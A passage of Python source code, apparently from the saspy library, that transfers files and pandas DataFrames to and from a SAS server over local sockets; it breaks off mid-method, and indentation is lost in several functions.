def _upload_client(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):
"""
This method uploads a local file to the SAS servers file system.
localfile - path to the local file to upload
remotefile - path to remote file to create or overwrite
overwrite - overwrite the output file if it exists?
permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
remf = remotefile
else:
if valid == {}:
remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]
else:
remf = remotefile
if overwrite == False:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" exists and overwrite was set to False. Upload was stopped."}
port = kwargs.get('port', 0)
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
if self.sascfg.ssh:
if not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
else:
host = ''
try:
fd = open(localfile, 'rb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(localfile)+" could not be opened. Error was: "+str(e)}
try:
sock = socks.socket()
if self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError:
return {'Success' : False,
'LOG' : "Error try to open a socket in the upload method. Call failed."}
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S lrecl=4096;
/* filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S encoding=binary lrecl=4096; */
data _null_; nb = -1;
infile sock nbyte=nb;
file saspydir;
input;
put _infile_;
run;
filename saspydir;
filename sock;\n"""
sock.listen(1)
self._asubmit(code, 'text')
if sel.select([sock],[],[],10)[0] == []:
print("error occured in SAS during upload. Check the returned LOG for issues.")
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Failure in upload.\n"+ll['LOG']}
newsock = (0,0)
try:
newsock = sock.accept()
while True:
buf = fd.read1(4096)
sent = 0
send = len(buf)
blen = send
if blen:
while send:
try:
sent = 0
sent = newsock[0].send(buf[blen-send:blen])
except (BlockingIOError):
pass
send -= sent
else:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
sock.close()
fd.close()
break
except (KeyboardInterrupt, Exception) as e:
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
ll = self.submit("", 'text')
return {'Success' : True,
'LOG' : ll['LOG']}
   def download(self, localfile: str, remotefile: str, overwrite: bool = True, **kwargs):
      """
      This method downloads a remote file from the SAS servers file system.
      The client side listens on a local socket; SAS connects back to it and
      streams the remote file's bytes, which are written to the local file.
      localfile  - path to the local file to create or overwrite
      remotefile - path to remote file to download
      overwrite  - overwrite the output file if it exists?

      Returns a dict with Success (bool) and LOG (the SAS log from the step).
      NOTE(review): the overwrite parameter is not checked in this body — the
      local file is opened 'wb' unconditionally; confirm intended behavior.
      """
      valid = self._sb.file_info(remotefile, quiet = True)
      if valid is None:
         return {'Success' : False,
                 'LOG'     : "File "+str(remotefile)+" does not exist."}
      if valid == {}:
         return {'Success' : False,
                 'LOG'     : "File "+str(remotefile)+" is a directory."}
      # localfile may be a directory: append the remote file's base name
      if os.path.isdir(localfile):
         locf = localfile + os.sep + remotefile.rpartition(self._sb.hostsep)[2]
      else:
         locf = localfile
      try:
         fd = open(locf, 'wb')
      except OSError as e:
         return {'Success' : False,
                 'LOG'     : "File "+str(locf)+" could not be opened. Error was: "+str(e)}
      port = kwargs.get('port', 0)
      if port==0 and self.sascfg.tunnel:
         # we are using a tunnel; default to that port
         port = self.sascfg.tunnel
      try:
         sock = socks.socket()
         if self.sascfg.tunnel:
            sock.bind(('localhost', port))
         else:
            sock.bind(('', port))
         # port may have been 0 (ephemeral); recover the real one for the SAS code
         port = sock.getsockname()[1]
      except OSError:
         return {'Success' : False,
                 'LOG'     : "Error try to open a socket in the download method. Call failed."}
      if self.sascfg.ssh:
         if not self.sascfg.tunnel:
            host = self.sascfg.hostip #socks.gethostname()
         else:
            host = 'localhost'
      else:
         host = ''
      # DATA step that reads the remote file and streams it to our socket.
      code = """
         filename saspydir '"""+remotefile+"""' recfm=F encoding=binary lrecl=4096;
         filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S lrecl=4096;
         /* filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S encoding=binary; */
         data _null_;
         file sock;
         infile saspydir;
         input;
         put _infile_;
         run;\n"""
      sock.listen(1)
      self._asubmit(code, 'text')
      # Give SAS up to 10 seconds to connect back; otherwise assume the step failed.
      if sel.select([sock],[],[],10)[0] == []:
         print("error occured in SAS during download. Check the returned LOG for issues.")
         sock.close()
         fd.close()
         ll = self.submit("", 'text')
         return {'Success' : False,
                 'LOG'     : "Failure in download.\n"+ll['LOG']}
      datar = b''
      newsock = (0,0)
      try:
         newsock = sock.accept()
         while True:
            data = newsock[0].recv(4096)
            if len(data):
               datar += data
            else:
               # Zero-byte recv means SAS closed the socket: flush the tail and stop.
               if len(datar):
                  fd.write(datar)
               break
            # Write in ~8K chunks once the buffer exceeds the threshold, keeping
            # the remainder buffered for the next pass.
            if len(datar) > 8300:
               fd.write(datar[:8192])
               datar = datar[8192:]
      except (KeyboardInterrupt, Exception) as e:
         try:
            if newsock[0]:
               newsock[0].shutdown(socks.SHUT_RDWR)
               newsock[0].close()
         except:
            pass
         sock.close()
         fd.close()
         ll = self.submit("filename saspydir;", 'text')
         return {'Success' : False,
                 'LOG'     : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
      newsock[0].shutdown(socks.SHUT_RDWR)
      newsock[0].close()
      sock.close()
      fd.flush()
      fd.close()
      # Free the remote fileref now that the transfer is complete.
      ll = self.submit("filename saspydir;", 'text')
      return {'Success' : True,
              'LOG'     : ll['LOG']}
def _getbytelenF(self, x):
return len(x.encode(self.sascfg.encoding))
def _getbytelenR(self, x):
return len(x.encode(self.sascfg.encoding, errors='replace'))
def dataframe2sasdata(self, df: '<Pandas Data Frame object>', table: str ='a',
libref: str ="", keep_outer_quotes: bool=False,
embedded_newlines: bool=True,
LF: str = '\x01', CR: str = '\x02',
colsep: str = '\x03', colrep: str = ' ',
datetimes: dict={}, outfmts: dict={}, labels: dict={},
outdsopts: dict={}, encode_errors = None, char_lengths = None,
**kwargs):
"""
This method imports a Pandas Data Frame to a SAS Data Set, returning the SASdata object for the new Data Set.
df - Pandas Data Frame to import to a SAS Data Set
table - the name of the SAS Data Set to create
libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned
keep_outer_quotes - for character columns, have SAS keep any outer quotes instead of stripping them off.
embedded_newlines - if any char columns have embedded CR or LF, set this to True to get them iported into the SAS data set
LF - if embedded_newlines=True, the chacter to use for LF when transferring the data; defaults to '\x01'
CR - if embedded_newlines=True, the chacter to use for CR when transferring the data; defaults to '\x02'
colsep - the column seperator character used for streaming the delimmited data to SAS defaults to '\x03'
datetimes - dict with column names as keys and values of 'date' or 'time' to create SAS date or times instead of datetimes
outfmts - dict with column names and SAS formats to assign to the new SAS data set
labels - dict with column names and SAS Labels to assign to the new SAS data set
outdsopts - a dictionary containing output data set options for the table being created
encode_errors - 'fail' or 'replace' - default is to 'fail', other choice is to 'replace' invalid chars with the replacement char
char_lengths - How to determine (and declare) lengths for CHAR variables in the output SAS data set
"""
input = ""
xlate = ""
card = ""
format = ""
length = ""
label = ""
dts = []
ncols = len(df.columns)
lf = "'"+'%02x' % ord(LF.encode(self.sascfg.encoding))+"'x"
cr = "'"+'%02x' % ord(CR.encode(self.sascfg.encoding))+"'x "
delim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x "
dtkeys = datetimes.keys()
fmtkeys = outfmts.keys()
labkeys = labels.keys()
if encode_errors is None:
encode_errors = 'fail'
if type(char_lengths) is not dict:
charlens = self._sb.df_char_lengths(df, encode_errors, char_lengths)
else:
charlens = char_lengths
if charlens is None:
return -1
charlens = {k.upper():v for k,v in charlens.items()}
if type(df.index) != pd.RangeIndex:
warnings.warn("Note that Indexes are not transferred over as columns. Only actual coulmns are transferred")
for name in df.columns:
colname = str(name)
input += "'"+colname+"'n "
if colname in labkeys:
label += "label '"+colname+"'n ="+labels[colname]+";\n"
if df.dtypes[name].kind in ('O','S','U','V'):
try:
length += " '"+colname+"'n $"+str(charlens[colname.upper()])
except KeyError as e:
print("Dictionary provided as char_lengths is missing column: "+colname)
raise e
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
if keep_outer_quotes:
input += "~ "
dts.append('C')
if embedded_newlines:
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0A'x, "+lf+");\n"
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0D'x, "+cr+");\n"
else:
if df.dtypes[name].kind in ('M'):
length += " '"+colname+"'n 8"
input += ":B8601DT26.6 "
if colname not in dtkeys:
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DT26.6 "
else:
if datetimes[colname].lower() == 'date':
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DA. "
xlate += " '"+colname+"'n = datepart('"+colname+"'n);\n"
else:
if datetimes[colname].lower() == 'time':
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601TM. "
xlate += " '"+colname+"'n = timepart('"+colname+"'n);\n"
else:
print("invalid value for datetimes for column "+colname+". Using default.")
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DT26.6 "
dts.append('D')
else:
length += " '"+colname+"'n 8"
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
if df.dtypes[name] == 'bool':
dts.append('B')
else:
dts.append('N')
port = kwargs.get('port', 0)
if self.sascfg.ssh and self.sascfg.rtunnel and port == 0:
# we are using a rtunnel; default to that port
server = True
port = self.sascfg.rtunnel
host = 'localhost'
code = """filename sock socket ':"""+str(port)+"""' server reconn=0 recfm=V termstr=LF;\n"""
else:
server = False
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
if self.sascfg.ssh:
if not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
else:
host = ''
try:
sock = socks.socket()
if self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError as e:
raise e
code = """filename sock socket '"""+host+""":"""+str(port)+"""' recfm=V termstr=LF;\n"""
code += "data "
if len(libref):
code += libref+"."
code += "'"+table.strip()+"'n"
if len(outdsopts):
code += '('
for key in outdsopts:
code += key+'='+str(outdsopts[key]) + ' '
code += ");\n"
else:
code += ";\n"
if len(length):
code += "length"+length+";\n"
if len(format):
code += "format "+format+";\n"
code += label
code += "infile sock nbyte=nb delimiter="+delim+" STOPOVER;\ninput @;\nif _infile_ = '' then delete;\n"
code += "else do;\n input "+input+";\n"+xlate+";\nend;\nrun;\nfilename sock;\n"
if not server:
sock.listen(1)
self._asubmit(code, "text")
if server:
sleep(1)
sock = socks.socket()
sock.connect((host, port))
ssock = sock
if not server:
if sel.select([sock],[],[],10)[0] == []:
print("error occured in SAS during data transfer. Check the LOG for issues.")
sock.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Failure in upload.\n"+ll['LOG']}
newsock = (0,0)
try:
newsock = sock.accept()
except (KeyboardInterrupt, Exception) as e:
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
print("error occured in SAS during data transfer. Check the LOG for issues.")
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
ssock = newsock[0]
logf = b''
first = True
fail = False
blksz = int(kwargs.get('blocksize', 32767))
row_num = 0
code = ""
for row in df.itertuples(index=False):
row_num += 1
card = ""
for col in range(ncols):
var = str(row[col])
if dts[col] == 'N' and var == 'nan':
var = '.'
elif dts[col] == 'C':
if var == 'nan' or len(var) == 0:
var = ' '
else:
var = var.replace(colsep, colrep)
elif dts[col] == 'B':
var = str(int(row[col]))
elif dts[col] == 'D':
if var in ['nan', 'NaT', 'NaN']:
var = '.'
else:
var = str(row[col].to_datetime64())[:26]
card += var
if col < (ncols-1):
card += colsep
if embedded_newlines:
card = card.replace(LF, colrep).replace(CR, colrep)
card = card.replace('\n', LF).replace('\r', CR)
code += card+"\n"
if len(code) > blksz:
first = False
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
logd = logf.decode(self.sascfg.encoding, errors='replace')
self._log += logd
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
ll = self.submit("", 'text')
print("Transcoding error encountered. Data transfer stopped on or before row "+str(row_num))
print("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
sent = 0
send = len(code)
blen = send
while send:
try:
sent = 0
sent = ssock.send(code[blen-send:blen])
except (BlockingIOError):
pass
except (OSError) as e:
if fail:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
print("Failed connecting to server socket. Check the SASLOG to see the error")
ll = self.submit("", 'text')
return row_num
fail = True
if server:
sock.close()
sock = socks.socket()
sock.connect((host, port))
ssock = sock
sleep(1)
pass
send -= sent
code = ""
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
logd = logf.decode(self.sascfg.encoding, errors='replace')
self._log += logd
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
if len(code):
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
ll = self.submit("", 'text')
print("Transcoding error encountered. Data transfer stopped on row "+str(row_num))
print("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
sent = 0
send = len(code)
blen = send
while send:
try:
sent = 0
sent = ssock.send(code[blen-send:blen])
except (BlockingIOError):
pass
except (OSError) as e:
print('first')
if not first:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
print("Failed connecting to server socket. Check the SASLOG to see the error")
ll = self.submit("", 'text')
return row_num
first = False
if server:
sock.close()
sock = socks.socket()
sock.connect((host, port))
ssock = sock
sleep(1)
pass
send -= sent
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
ll = self.submit("", 'text')
return None
def dataframe2sasdataORIG(self, df: '<Pandas Data Frame object>', table: str ='a',
libref: str ="", keep_outer_quotes: bool=False,
embedded_newlines: bool=True,
LF: str = '\x01', CR: str = '\x02',
colsep: str = '\x03', colrep: str = ' ',
datetimes: dict={}, outfmts: dict={}, labels: dict={},
outdsopts: dict={}, encode_errors = None, char_lengths = None,
**kwargs):
"""
This method imports a Pandas Data Frame to a SAS Data Set, returning the SASdata object for the new Data Set.
df - Pandas Data Frame to import to a SAS Data Set
table - the name of the SAS Data Set to create
libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned
keep_outer_quotes - for character columns, have SAS keep any outer quotes instead of stripping them off.
embedded_newlines - if any char columns have embedded CR or LF, set this to True to get them iported into the SAS data set
LF - if embedded_newlines=True, the chacter to use for LF when transferring the data; defaults to '\x01'
CR - if embedded_newlines=True, the chacter to use for CR when transferring the data; defaults to '\x02'
colsep - the column seperator character used for streaming the delimmited data to SAS defaults to '\x03'
datetimes - dict with column names as keys and values of 'date' or 'time' to create SAS date or times instead of datetimes
outfmts - dict with column names and SAS formats to assign to the new SAS data set
labels - dict with column names and SAS Labels to assign to the new SAS data set
outdsopts - a dictionary containing output data set options for the table being created
encode_errors - 'fail' or 'replace' - default is to 'fail', other choice is to 'replace' invalid chars with the replacement char
char_lengths - How to determine (and declare) lengths for CHAR variables in the output SAS data set
"""
input = ""
xlate = ""
card = ""
format = ""
length = ""
label = ""
dts = []
ncols = len(df.columns)
lf = "'"+'%02x' % ord(LF.encode(self.sascfg.encoding))+"'x"
cr = "'"+'%02x' % ord(CR.encode(self.sascfg.encoding))+"'x "
delim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x "
dtkeys = datetimes.keys()
fmtkeys = outfmts.keys()
labkeys = labels.keys()
if encode_errors is None:
encode_errors = 'fail'
bpc = self._sb.pyenc[0]
if char_lengths and str(char_lengths).strip() in ['1','2','3','4']:
bpc = int(char_lengths)
if char_lengths and str(char_lengths) == 'exact':
CnotB = False
else:
CnotB = bpc == 1
if type(char_lengths) is not dict:
charlens = self._sb.df_char_lengths(df, encode_errors, char_lengths)
else:
charlens = char_lengths
if charlens is None:
return -1
charlens = {k.upper():v for k,v in charlens.items()}
for name in df.columns:
colname = str(name)
input += "'"+colname+"'n "
if colname in labkeys:
label += "label '"+colname+"'n ="+labels[colname]+";\n"
if df.dtypes[name].kind in ('O','S','U','V'):
try:
length += " '"+colname+"'n $"+str(charlens[colname.upper()])
except KeyError as e:
print("Dictionary provided as char_lengths is missing column: "+colname)
raise e
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
if keep_outer_quotes:
input += "~ "
dts.append('C')
if embedded_newlines:
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0A'x, "+lf+");\n"
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0D'x, "+cr+");\n"
else:
if df.dtypes[name].kind in ('M'):
length += " '"+colname+"'n 8"
input += ":B8601DT26.6 "
if colname not in dtkeys:
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DT26.6 "
else:
if datetimes[colname].lower() == 'date':
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DA. "
xlate += " '"+colname+"'n = datepart('"+colname+"'n);\n"
else:
if datetimes[colname].lower() == 'time':
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601TM. "
xlate += " '"+colname+"'n = timepart('"+colname+"'n);\n"
else:
print("invalid value for datetimes for column "+colname+". Using default.")
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DT26.6 "
dts.append('D')
else:
length += " '"+colname+"'n 8"
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
if df.dtypes[name] == 'bool':
dts.append('B')
else:
dts.append('N')
code = "data "
if len(libref):
code += libref+"."
code += "'"+table.strip()+"'n"
if len(outdsopts):
code += '('
for key in outdsopts:
code += key+'='+str(outdsopts[key]) + ' '
code += ");\n"
else:
code += ";\n"
if len(length):
code += "length"+length+";\n"
if len(format):
code += "format "+format+";\n"
code += label
code += "infile datalines delimiter="+delim+" STOPOVER;\ninput @;\nif _infile_ = '' then delete;\n"
code += "else do;\n input "+input+";\n"+xlate+";\nend;\ndatalines4;"
self._asubmit(code, "text")
logf = b''
blksz = int(kwargs.get('blocksize', 32767))
row_num = 0
code = ""
for row in df.itertuples(index=False):
row_num += 1
card = ""
for col in range(ncols):
var = str(row[col])
if dts[col] == 'N' and var == 'nan':
var = '.'
elif dts[col] == 'C':
if var == 'nan' or len(var) == 0:
var = ' '
else:
var = var.replace(colsep, colrep)
elif dts[col] == 'B':
var = str(int(row[col]))
elif dts[col] == 'D':
if var in ['nan', 'NaT', 'NaN']:
var = '.'
else:
var = str(row[col].to_datetime64())[:26]
card += var
if col < (ncols-1):
card += colsep
if embedded_newlines:
card = card.replace(LF, colrep).replace(CR, colrep)
card = card.replace('\n', LF).replace('\r', CR)
code += card+"\n"
if len(code) > blksz:
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
self._asubmit(";;;;\n;;;;", "text")
ll = self.submit("quit;", 'text')
print("Transcoding error encountered. Data transfer stopped on or before row "+str(row_num))
print("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
#self.stdin.write(code+b'\n')
os.write(self.pin, code+b'\n')
self.stdin.flush()
code = ""
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
logd = logf.decode(self.sascfg.encoding, errors='replace')
self._log += logd
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
if len(code):
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
self._asubmit(";;;;\n;;;;", "text")
ll = self.submit("quit;", 'text')
print("Transcoding error encountered. Data transfer stopped on row "+str(row_num))
print("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
#self.stdin.write(code+b'\n')
os.write(self.pin, code+b'\n')
self.stdin.flush()
self._asubmit(";;;;\n;;;;", "text")
ll = self.submit("quit;", 'text')
return None
def sasdata2dataframe(self, table: str, libref: str ='', dsopts: dict = None,
                      rowsep: str = '\x01', colsep: str = '\x02',
                      rowrep: str = ' ', colrep: str = ' ',
                      port: int=0, wait: int=10, **kwargs) -> '<Pandas Data Frame object>':
    """
    This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.
    table  - the name of the SAS Data Set you want to export to a Pandas Data Frame
    libref - the libref for the SAS Data Set.
    rowsep - the row seperator character to use; defaults to '\x01'
    colsep - the column seperator character to use; defaults to '\x02'
    rowrep - the char to convert to for any embedded rowsep chars, defaults to ' '
    colrep - the char to convert to for any embedded colsep chars, defaults to ' '
    port   - port to use for socket. Defaults to 0 which uses a random available ephemeral port
    wait   - seconds to wait for socket connection from SAS; catches hang if an error in SAS. 0 = no timeout
    """
    dsopts = dsopts if dsopts is not None else {}

    # Dispatch to the CSV or DISK transfer strategies when requested via method=.
    method = kwargs.pop('method', None)
    if method and method.lower() == 'csv':
        return self.sasdata2dataframeCSV(table, libref, dsopts, port=port, wait=wait, **kwargs)
    elif method and method.lower() == 'disk':
        return self.sasdata2dataframeDISK(table, libref, dsopts, rowsep, colsep,
                                          rowrep, colrep, port=port, wait=wait, **kwargs)

    # These kwargs only apply to the CSV/DISK variants; warn (if verbose) and ignore.
    my_fmts = kwargs.pop('my_fmts', False)
    k_dts = kwargs.pop('dtype', None)
    if self.sascfg.verbose:
        if my_fmts != False:
            print("'my_fmts=' is only used with the CSV or DISK version of this method. option ignored.")
        if k_dts is not None:
            print("'dtype=' is only used with the CSV or DISK version of this method. option ignored.")

    if port==0 and self.sascfg.tunnel:
        # we are using a tunnel; default to that port
        port = self.sascfg.tunnel

    datar = ""

    if libref:
        tabname = libref+".'"+table.strip()+"'n "
    else:
        tabname = "'"+table.strip()+"'n "

    # Probe the data set (a _null_ step writing to STDERR) for record length,
    # variable count, and the variable names and types.
    code = "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";run;\n"
    code += "data _null_; file STDERR;d = open('work.sasdata2dataframe');\n"
    code += "lrecl = attrn(d, 'LRECL'); nvars = attrn(d, 'NVARS');\n"
    code += "lr='LRECL='; vn='VARNUMS='; vl='VARLIST='; vt='VARTYPE=';\n"
    code += "put lr lrecl; put vn nvars; put vl;\n"
    code += "do i = 1 to nvars; var = varname(d, i); put var; end;\n"
    code += "put vt;\n"
    code += "do i = 1 to nvars; var = vartype(d, i); put var; end;\n"
    code += "run;"

    ll = self.submit(code, "text")

    # Parse LRECL, VARNUMS, VARLIST and VARTYPE back out of the SAS log.
    l2 = ll['LOG'].rpartition("LRECL= ")
    l2 = l2[2].partition("\n")
    lrecl = int(l2[0])

    l2 = l2[2].partition("VARNUMS= ")
    l2 = l2[2].partition("\n")
    nvars = int(l2[0])

    l2 = l2[2].partition("\n")
    varlist = l2[2].split("\n", nvars)
    del varlist[nvars]

    l2 = l2[2].partition("VARTYPE=")
    l2 = l2[2].partition("\n")
    vartype = l2[2].split("\n", nvars)
    del vartype[nvars]

    # Get each variable's format category; drop row-subsetting options so the
    # one-observation probe step can't come up empty.
    topts = dict(dsopts)
    topts.pop('firstobs', None)
    topts.pop('obs', None)

    code = "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"
    code += "data work._n_u_l_l_;output;run;\n"
    code += "data _null_; file STDERR; set work._n_u_l_l_ "+tabname+self._sb._dsopts(topts)+";put 'FMT_CATS=';\n"
    for i in range(nvars):
        code += "_tom = vformatn('"+varlist[i]+"'n);put _tom;\n"
    code += "stop;\nrun;\nproc delete data=work._n_u_l_l_;run;"

    ll = self.submit(code, "text")

    l2 = ll['LOG'].rpartition("FMT_CATS=")
    l2 = l2[2].partition("\n")
    varcat = l2[2].split("\n", nvars)
    del varcat[nvars]

    def _typecast(tdf):
        # Coerce numeric columns to numbers, ISO8601 date/time columns to
        # datetimes, and blank single-space char values to NaN.
        for i in range(nvars):
            if vartype[i] == 'N':
                if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
                    if tdf.dtypes[tdf.columns[i]].kind not in ('f','u','i','b','B','c','?'):
                        tdf[varlist[i]] = pd.to_numeric(tdf[varlist[i]], errors='coerce')
                else:
                    if tdf.dtypes[tdf.columns[i]].kind not in ('M'):
                        tdf[varlist[i]] = pd.to_datetime(tdf[varlist[i]], errors='coerce')
            else:
                # np.nan (np.NaN was removed in numpy 2.0)
                tdf[varlist[i]].replace(' ', np.nan, inplace=True)
        return tdf

    # Open the local socket SAS will stream the data back to.
    try:
        sock = socks.socket()
        if self.sascfg.tunnel:
            sock.bind(('localhost', port))
        else:
            sock.bind(('', port))
        port = sock.getsockname()[1]
    except OSError:
        print('Error try to open a socket in the sasdata2dataframe method. Call failed.')
        return None

    if self.sascfg.ssh:
        if not self.sascfg.tunnel:
            host = self.sascfg.hostip #socks.gethostname()
        else:
            host = 'localhost'
    else:
        host = ''

    # Hex literals for the row/column delimiters, for use in the SAS code.
    rdelim = "'"+'%02x' % ord(rowsep.encode(self.sascfg.encoding))+"'x"
    cdelim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x"

    if self._sb.m5dsbug:
        code = "filename sock socket '"+host+":"+str(port)+"' lrecl="+str(self.sascfg.lrecl)+" recfm=v termstr=LF;\n"
    else:
        code = "filename sock socket '"+host+":"+str(port)+"' recfm=S lrecl=4096;\n"
        #code = "filename sock socket '"+host+":"+str(port)+"' lrecl=1 recfm=f encoding=binary;\n"

    code += "data _null_; set "+tabname+self._sb._dsopts(dsopts)+";\n"

    # Force ISO8601 formats on date/time/datetime vars and best32. on other numerics.
    for i in range(nvars):
        if vartype[i] == 'N':
            code += "format '"+varlist[i]+"'n "
            if varcat[i] in self._sb.sas_date_fmts:
                code += 'E8601DA10.'
            else:
                if varcat[i] in self._sb.sas_time_fmts:
                    code += 'E8601TM15.6'
                else:
                    if varcat[i] in self._sb.sas_datetime_fmts:
                        code += 'E8601DT26.6'
                    else:
                        code += 'best32.'
            code += '; '
        if i % 10 == 0:
            code +='\n'

    if self._sb.m5dsbug:
        rsep = colsep+rowsep+'\n'
        csep = colsep

        code += "\nfile sock dlm="+cdelim+";\n"
        for i in range(nvars):
            if vartype[i] != 'N':
                # Scrub embedded delimiter chars out of character values so they
                # can't be mistaken for row/column separators.
                code += "'"+varlist[i]+"'n = translate('"
                code += varlist[i]+"'n, '{}'x, '{}'x); ".format( \
                    '%02x%02x' % \
                    (ord(rowrep.encode(self.sascfg.encoding)), \
                     ord(colrep.encode(self.sascfg.encoding))),
                    '%02x%02x' % \
                    (ord(rowsep.encode(self.sascfg.encoding)), \
                     ord(colsep.encode(self.sascfg.encoding))))
            if i % 10 == 0:
                code +='\n'

        code += "\nput "
        for i in range(nvars):
            code += " '"+varlist[i]+"'n "
            if i % 10 == 0:
                code +='\n'
        code += rdelim+";\nrun;"
    else:
        rsep = ' '+rowsep
        csep = ' '+colsep

        code += "\nfile sock;\n"
        for i in range(nvars):
            if vartype[i] != 'N':
                code += "'"+varlist[i]+"'n = translate('"
                code += varlist[i]+"'n, '{}'x, '{}'x); ".format( \
                    '%02x%02x' % \
                    (ord(rowrep.encode(self.sascfg.encoding)), \
                     ord(colrep.encode(self.sascfg.encoding))),
                    '%02x%02x' % \
                    (ord(rowsep.encode(self.sascfg.encoding)), \
                     ord(colsep.encode(self.sascfg.encoding))))
            if i % 10 == 0:
                code +='\n'

        code += "\n"
        last = len(varlist)-1
        for i in range(nvars):
